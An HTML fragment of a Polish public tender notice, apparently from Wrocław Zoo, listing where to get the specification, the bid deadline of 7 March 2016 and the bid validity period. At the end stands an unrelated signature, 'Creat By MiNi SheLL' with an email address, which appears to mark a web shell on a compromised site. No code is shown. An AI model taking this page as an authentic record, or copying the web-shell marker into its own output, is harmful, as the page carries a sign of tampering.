<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zoo.wroclaw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego we Wrocławiu ul. Wróblewskiego 1-5,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.03.2016 godzina 10:00, miejsce: w siedzibie Zamawiającego  (sekretariat Zarządu) we Wrocławiu ul. Wróblewskiego 1-5,.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com